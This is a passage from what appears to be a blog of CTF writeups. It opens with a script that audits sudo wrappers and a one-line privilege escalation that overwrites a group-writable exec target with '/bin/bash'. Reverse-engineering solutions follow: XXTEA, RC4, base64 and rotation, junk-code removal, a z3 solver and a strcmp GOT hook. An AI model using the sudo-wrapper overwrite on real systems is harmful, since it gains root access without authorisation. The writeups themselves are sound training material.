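The root path here was a sudo wrapper whose exec target is writable by a group the foothold user belongs to. Checking for that pattern is routine once you have a sudo -l entry, so here is an added example (not from the original post) that does it: it pulls the absolute paths out of a wrapper script, ignores the export lines that only set up the environment, and reports any target the current user can write. demo() builds a constructed fixture in a temporary directory modelled on rvm_rails.sh; the script and target paths in it are made up for the test, not taken from the box.

```python
import os
import re
import stat
import tempfile

# an absolute path token: starts with "/" and is not glued to the tail of another path
ABS_PATH = re.compile(r"(?<![\w./+@-])(/[\w./+@-]+)")


def exec_targets(script_text):
    """Absolute paths on lines that run something. Comment and export lines only
    set up the environment (PATH, GEM_HOME, ...) and are skipped."""
    found = []
    for line in script_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("export "):
            continue
        found.extend(ABS_PATH.findall(line))
    return sorted(set(found))


def writable_by_me(path):
    # os.access uses the real uid/gid, i.e. what a shell as this user can actually do;
    # a writable target behind a sudo wrapper means arbitrary commands as the wrapper's caller
    return os.path.isfile(path) and os.access(path, os.W_OK)


def audit_wrapper(script_path):
    """(path, mode, uid, gid) for every exec target of the wrapper that we could overwrite."""
    with open(script_path) as f:
        text = f.read()
    findings = []
    for p in exec_targets(text):
        if writable_by_me(p):
            st = os.stat(p)
            findings.append((p, oct(stat.S_IMODE(st.st_mode)), st.st_uid, st.st_gid))
    return findings


def demo():
    """Constructed fixture: a wrapper like rvm_rails.sh whose exec target is a file we own."""
    tmp = tempfile.mkdtemp()
    target = os.path.join(tmp, "rails")
    with open(target, "w") as f:
        f.write("#!/bin/sh\necho rails\n")
    os.chmod(target, 0o775)                       # group-writable, as on the box
    wrapper = os.path.join(tmp, "rvm_rails.sh")
    with open(wrapper, "w") as f:
        f.write("#!/bin/bash\n"
                "export PATH=/nonexistent/gems/bin:/usr/bin:/bin\n"
                f"exec {target} \"$@\"\n")
    with open(wrapper) as f:
        targets = exec_targets(f.read())
    return targets, audit_wrapper(wrapper), target


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:] or []:
        for finding in audit_wrapper(path):
            print(path, "->", *finding)
```

Run it against every script sudo -l lists; anything it prints is a one-line root (echo "/bin/bash" > target, then the sudo command), exactly as above. Directories in PATH that you can write are a second, separate hijack and are deliberately out of scope here.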
Lanqiao Cup (蓝桥杯) Cybersecurity track, reverse WP https://dirtycow.cn/237.html Sat, 27 Apr 2024 10:18:00 +0800 Inf0 re1

Open it in IDA and go straight to the pseudocode

image-20240427111249890.png

The logic is simple: the input is stored in buff, encrypted by the cry function and compared with the ciphertext v6

Look at cry

image-20240427111630697.png

It is a modified XXTEA: the round count and the DELTA handling have been changed

Write a script to decrypt enc

#include <stdio.h>
#include <stdint.h>
#define DELTA 0x9e3779b9

/* XXTEA (btea) decryption with the challenge's modified round count */
void btea(uint32_t *v, int n, uint32_t const key[4])
{
    uint32_t y, z, sum;
    unsigned i, rounds, e;
    rounds = 415 / n + 114;   /* modified: stock XXTEA uses 6 + 52/n */
    sum = rounds * DELTA;     /* start from the final sum of the encryption */
    y = v[0];
    do
    {
        e = (sum >> 2) & 3;
        for (i = n - 1; i > 0; i--)   /* walk the words backwards */
        {
            z = v[i - 1];             /* v[i] needs v[i-1] (still encrypted) and v[i+1] (already decrypted, in y) */
            v[i] -= (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(i & 3) ^ e] ^ z)));
            y = v[i];                 /* this loop stops at v[1] */
        }
        z = v[n - 1];                 /* v[0] needs v[n-1] and v[1] */
        v[0] -= (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(i & 3) ^ e] ^ z)));
        y = v[0];
        sum += 0x61C88647;            /* same as sum -= DELTA modulo 2^32 */
    }
    while (--rounds);
}


int main()
{
    uint32_t enc_data[] = {0x480AC20C, 0xCE9037F2, 0x8C212018, 0x0E92A18D, 0xA4035274, 0x2473AAB1, 0xA9EFDB58, 0xA52CC5C8, 0xE432CB51, 0xD04E9223, 0x6FD07093};
    uint32_t const k[4] = {0x79696755, 0x67346F6C, 0x69231231, 0x5F674231};
    int n = 11;
    btea(enc_data, n, k);
    for (int i = 0; i < sizeof(enc_data) / sizeof(uint32_t); i++)
    {
        /* "%x" drops leading zeros; in the output below only the final padding word is affected */
        printf("%x", enc_data[i]);
    }

    return 0;
}

Output:

67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35

For convenience, convert the hex to a string with Python

enc = "67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35"

for i in range(0, len(enc), 2):
    print(chr(int(enc[i:i+2], 16)), end="")

Output:

galfcfe{f8fcc0-01-79-ce20e289c0-429d33e2}5

The characters are out of order: each 32-bit word was printed most-significant byte first, while the flag bytes sit in memory little-endian. Reverse every 4-character group

enc = "67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35"
flag = ''

for i in range(0, len(enc), 2):
    flag += chr(int(enc[i:i+2], 16))

for i in range(0, len(flag), 4):
    print(flag[i:i+4][::-1], end="")

Output:

flag{efccf8f0-0c97-12ec-82e0-0c9d9242e335}
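Added example, not code from the original writeup: a Python port of the modified XXTEA above together with the matching encryption routine, so the recovered flag can be verified by re-encrypting it, and with struct.pack("<I") handling the little-endian byte order directly instead of the 4-character reversal. ENC and KEY are the values from the C program; the only assumption is the standard XXTEA encryption schedule with the same modified round count, which is what the decryptor inverts.

```python
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF


def _mx(sum_, y, z, p, e, key):
    """The XXTEA mixing term, truncated to 32 bits like the C version."""
    return ((((z >> 5) ^ ((y << 2) & MASK)) + ((y >> 3) ^ ((z << 4) & MASK)))
            ^ ((sum_ ^ y) + (key[(p & 3) ^ e] ^ z))) & MASK


def rounds_for(n):
    return 415 // n + 114          # the challenge's schedule; stock XXTEA uses 6 + 52 // n


def xxtea_decrypt(words, key):
    v = list(words)
    n = len(v)
    rounds = rounds_for(n)
    sum_ = (rounds * DELTA) & MASK  # start at the final sum and walk back
    y = v[0]
    while rounds:
        e = (sum_ >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = v[p - 1]
            v[p] = (v[p] - _mx(sum_, y, z, p, e, key)) & MASK
            y = v[p]
        z = v[n - 1]
        v[0] = (v[0] - _mx(sum_, y, z, 0, e, key)) & MASK
        y = v[0]
        sum_ = (sum_ - DELTA) & MASK
        rounds -= 1
    return v


def xxtea_encrypt(words, key):
    """Forward direction, so a recovered plaintext can be checked against the ciphertext."""
    v = list(words)
    n = len(v)
    rounds = rounds_for(n)
    sum_ = 0
    z = v[n - 1]
    while rounds:
        sum_ = (sum_ + DELTA) & MASK
        e = (sum_ >> 2) & 3
        for p in range(n - 1):
            y = v[p + 1]
            v[p] = (v[p] + _mx(sum_, y, z, p, e, key)) & MASK
            z = v[p]
        y = v[0]
        v[n - 1] = (v[n - 1] + _mx(sum_, y, z, n - 1, e, key)) & MASK
        z = v[n - 1]
        rounds -= 1
    return v


def words_to_bytes(words):
    return struct.pack("<%dI" % len(words), *words)   # little-endian, as stored in memory


def bytes_to_words(data):
    data = data.ljust((len(data) + 3) // 4 * 4, b"\0")
    return list(struct.unpack("<%dI" % (len(data) // 4), data))


# values from the C program above
ENC = [0x480AC20C, 0xCE9037F2, 0x8C212018, 0x0E92A18D, 0xA4035274, 0x2473AAB1,
       0xA9EFDB58, 0xA52CC5C8, 0xE432CB51, 0xD04E9223, 0x6FD07093]
KEY = [0x79696755, 0x67346F6C, 0x69231231, 0x5F674231]


def recover_flag():
    return words_to_bytes(xxtea_decrypt(ENC, KEY)).rstrip(b"\0").decode()


if __name__ == "__main__":
    flag = recover_flag()
    print(flag, xxtea_encrypt(bytes_to_words(flag.encode()), KEY) == ENC)
```

Packing with "<I" is the general fix for the reversed-groups symptom: the decryptor never printed anything wrong, it printed words instead of bytes.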

re2

Straight into the IDA pseudocode

image-20240427093116948.png

image-20240427093129676.png

A series of assignments, after which the variables are passed to sub_401005; follow it

image-20240427093427762.png

It is plain RC4; a breakpoint on the return shows the decrypted data

image-20240427093458621.png

Flag obtained

image-20240427093627803.png

[Yangcheng Cup (羊城杯) 2020] easyre wp https://dirtycow.cn/223.html Thu, 29 Feb 2024 18:53:00 +0800 Inf0 Approach:

64-bit exe, not packed

Open it in IDA

image-20240229201911471.png

Rename the variables to make the code readable

Brief analysis of the code

Str2 is the encrypted flag

Str is the user input

Str goes through three encryption functions and is then compared with Str2

Look at encode_three first

image-20240229204446829.png

This function shifts each character; since it uses a modulus, rather than inverting it analytically, brute-force it

Next, encode_two

image-20240229204907302.png

This function rotates the string in blocks of 13 characters

Finally, encode_one

image-20240229205021296.png

This one is recognisable at a glance: base64

image-20240229205047054.png

The alphabet variable is the standard base64 table

Write a script to recover the flag

exp:

import base64

enc = "EmBmP5Pmn7QcPU4gLYKv5QcMmB3PWHcP5YkPq3=cT6QckkPckoRG"


def shift3(c):
    # encode_three: shift by 3 within each class (upper, lower, digit); other characters unchanged
    if 65 <= c <= 90:
        return (c - 65 + 3) % 26 + 65
    if 97 <= c <= 122:
        return (c - 97 + 3) % 26 + 97
    if 48 <= c <= 57:
        return (c - 48 + 3) % 10 + 48
    return c


# undo encode_three by brute force over printable ASCII
enc_decode = ""
for ch in enc:
    for cand in range(32, 128):
        if chr(shift3(cand)) == ch:
            enc_decode += chr(cand)

# undo encode_two: put the four 13-character blocks back in their original order
enc_decode_2 = enc_decode[13:26] + enc_decode[39:52] + enc_decode[0:13] + enc_decode[26:39]

# undo encode_one: standard base64
print(base64.b64decode(enc_decode_2.encode()))

Summary:

  • Key points:

    • brute force

flag

GWHT{672cc4778a38e80cb362987341133ea2}
[GFCTF 2021]wordy wp https://dirtycow.cn/216.html Wed, 28 Feb 2024 19:51:00 +0800 Inf0 Approach:

64-bit ELF, not packed

Open it in IDA and look at main

image-20240228183956816.png

What greets you is a CODE XREF and a large blob of data: this must be junk code inserted to break disassembly

Try removing the junk instructions

image-20240228185207078.png

Another junk instruction appears right after

Keep repeating the removal

image-20240228185359264.png

Characters that look like the flag appear

This repetitive work is better handed to IDAPython

Each character is preceded by FF C0; write a script that locates the characters through those two bytes

image-20240228185943670.png

exp:

import ida_bytes

start_addr = 0x1135
end_addr = 0x3000

# every flag character sits 3 bytes after an FF C0 (inc eax) pair
for i in range(start_addr, end_addr):
    if ida_bytes.get_byte(i) == 0xFF and ida_bytes.get_byte(i + 1) == 0xC0:
        print(chr(ida_bytes.get_byte(i + 3)), end="")

Output:

hello world!
There are moments in life when you miss someone so much that you just want to pick them from your dreams and hug them for real! Dream what you want to dream;go where you want to go;be what you want to be,because you have only one life and one chance to do all the things you want to do.
May you have enough happiness to make you sweet,enough trials to make you strong,enough sorrow to keep you human,enough hope to make you happy? Always put yourself in others'shoes.If you feel that it hurts you,it probably hurts the other person, too.

GFCTF{u_are2wordy}
You find Flag, Congratulation!
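The IDAPython loop needs a running IDA session. The same extraction works offline over the raw file bytes, which is handy for scripting it across a batch of samples or for checking how many false positives a marker like FF C0 produces elsewhere in .text. This is an added example, not part of the original writeup: a standalone Python version of the marker scan that keeps overlapping matches exactly like the byte-by-byte loop above, plus a printable-run filter. make_sample builds a constructed byte blob for the test; for a real binary pass the file and the offset range (for this PIE ELF the IDA addresses usually equal file offsets, but verify against readelf -l before trusting them).

```python
import re

# FF C0 is "inc eax"; in this binary each flag character sits 3 bytes after such a pair,
# which is exactly what the IDAPython loop above keys on. The lookahead keeps overlapping
# matches, so it behaves like the byte-by-byte loop rather than skipping ahead.
MARKER = re.compile(rb"(?=\xff\xc0.(.))", re.DOTALL)


def extract_after_marker(blob, start=0, end=None):
    """Byte found 3 positions after every FF C0 pair in blob[start:end], concatenated."""
    return b"".join(m.group(1) for m in MARKER.finditer(blob[start:end]))


def printable_runs(data, min_len=4):
    """Filter out the noise that real `inc eax` instructions elsewhere in .text produce."""
    return [r for r in re.split(rb"[^\x20-\x7e]+", data) if len(r) >= min_len]


def make_sample(text):
    """Constructed stand-in for the .text bytes: junk opcodes with the FF C0 marker before each char."""
    junk = b"\x55\x48\x89\xe5"
    return junk + b"".join(b"\xff\xc0\x04" + bytes([c]) + b"\xeb\x02" for c in text) + junk


def extract_from_file(path, start, end):
    with open(path, "rb") as f:
        data = f.read()
    return printable_runs(extract_after_marker(data, start, end))


if __name__ == "__main__":
    import sys
    # python3 this.py ./wordy 0x1135 0x3000
    path, start, end = sys.argv[1], int(sys.argv[2], 16), int(sys.argv[3], 16)
    for run in extract_from_file(path, start, end):
        print(run.decode(errors="replace"))
```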

Summary:

Key points:

  • junk (anti-disassembly) code
  • IDAPython

flag:

GFCTF{u_are2wordy}
[ACTF Freshman Competition 2020]Universe_final_answer wp https://dirtycow.cn/209.html Mon, 26 Feb 2024 20:45:00 +0800 Inf0 Approach:

Look at the program's main function

image-20240226204044046.png

Making sub_860 return true yields the flag

Follow it

image-20240226204238539.png

A system of linear constraints this regular is a job for z3

exp:

from z3 import *

v1,v2, v3, v4, v5, v6, v7, v8, v9, v11 = Ints('v1 v2 v3 v4 v5 v6 v7 v8 v9 v11')

solver = Solver()
solver.add(v1 < 128)
solver.add(v2 < 128)
solver.add(v3 < 128)
solver.add(v4 < 128)
solver.add(v5 < 128)
solver.add(v6 < 128)
solver.add(v7 < 128)
solver.add(v8 < 128)
solver.add(v9 < 128)
solver.add(v11 < 128)

solver.add(-85 * v9 + 58 * v8 + 97 * v6 + v7 + -45 * v5 + 84 * v4 + 95 * v2 - 20 * v1 + 12 * v3 == 12613)
solver.add(30 * v11 + -70 * v9 + -122 * v6 + -81 * v7 + -66 * v5 + -115 * v4 + -41 * v3 + -86 * v1 - 15 * v2 - 30 * v8 == -54400)
solver.add(-103 * v11 + 120 * v8 + 108 * v7 + 48 * v4 + -89 * v3 + 78 * v1 - 41 * v2 + 31 * v5 - (v6 *64) - 120 * v9 == -10283)
solver.add(71 * v6 + (v7 * 128) + 99 * v5 + -111 * v3 + 85 * v1 + 79 * v2 - 30 * v4 - 119 * v8 + 48 * v9 - 16 * v11 == 22855)
solver.add(5 * v11 + 23 * v9 + 122 * v8 + -19 * v6 + 99 * v7 + -117 * v5 + -69 * v3 + 22 * v1 - 98 * v2 + 10 * v4 == -2944)
solver.add(-54 * v11 + -23 * v8 + -82 * v3 + -85 * v2 + 124 * v1 - 11 * v4 - 8 * v5 - 60 * v7 + 95 * v6 + 100 * v9 == -2222)
solver.add(-83 * v11 + -111 * v7 + -57 * v2 + 41 * v1 + 73 * v3 - 18 * v4 + 26 * v5 + 16 * v6 + 77 * v8 - 63 * v9 == -13258)
solver.add(81 * v11 + -48 * v9 + 66 * v8 + -104 * v6 + -121 * v7 + 95 * v5 + 85 * v4 + 60 * v3 + -85 * v2 + 80 * v1 == -1559)
solver.add(101 * v11 + -85 * v9 + 7 * v6 + 117 * v7 + -83 * v5 + -101 * v4 + 90 * v3 + -28 * v1 + 18 * v2 - v8 == 6308)
solver.add(99 * v11 + -28 * v9 + 5 * v8 + 93 * v6 + -18 * v7 + -127 * v5 + 6 * v4 + -9 * v3 + -93 * v1 + 58 * v2 == -1697)

if solver.check() == sat:
    print(solver.model())


# values copied from solver.model() above, in the order v1..v9, v11
flag = [70, 48, 117, 82, 84, 121, 95, 55, 119, 64]


for i in flag:
    print(chr(i), end="")

The shifts in the decompiled code are written as multiplications for z3 (v7 << 7 becomes v7 * 128, v6 << 6 becomes v6 * 64)

flag:

actf{F0uRTy_7w@_42}
[Zer0pts2020]easy strcmp wp https://dirtycow.cn/208.html Mon, 26 Feb 2024 16:26:00 +0800 Inf0 Approach

A 64-bit program; open it in IDA

image-20240226112347596.png

The program compares the user input with the string zer0pts{********CENSORED********}

Submitting that as the flag fails

Keep analysing

Look at the init function

image-20240226114941107.png

It calls the functions listed from funcs_889 onwards in turn

Follow them

image-20240226115104941.png

sub_6E turns out to be empty

image-20240226125443454.png

Near it is sub_795

Follow that one

image-20240226125549410.png

This function stores strcmp in qword_201090 and replaces off_201028 with sub_6EA

Look at off_201028

image-20240226155507023.png

It is exactly strcmp's slot in the PLT/GOT, so every strcmp call now goes through sub_6EA first

Look at the logic of sub_6EA

image-20240226155809056.png

Check qword_201060

image-20240226160538423.png

Adding the values from qword_201060 back to the input, following the code above, restores the flag

exp

#include<stdio.h>
#include<stdint.h>
#include<string.h>
int main()
{
    /* 40 bytes, not strlen+1: the loop below touches 5 qwords (the last one adds 0),
       so the buffer must cover all 40 bytes or the write runs past the array */
    char enc[40] = "zer0pts{********CENSORED********}";
    uint64_t key[] = {0, 0x410A4335494A0942, 0x0B0EF2F50BE619F0, 0x4F0A3A064A35282B, 0};
    int len = strlen(enc);
    len = (len >> 3) + 1;   /* number of 8-byte words to process */
    for(int i = 0; i < len; i++)
    {
        /* sub_6EA subtracted key[i] from each qword of the input before the real strcmp; add it back */
        *(uint64_t *)&(enc[8 * i]) += key[i];
    }
    printf("%s", enc);

    return 0;
}

Because the data is qword-sized, use uint64_t (or __int64)

It is not written as enc[8 * i] because the char array has to be read as 64-bit words, hence the pointer cast

flag

zer0pts{l3ts_m4k3_4_DETOUR_t0d4y}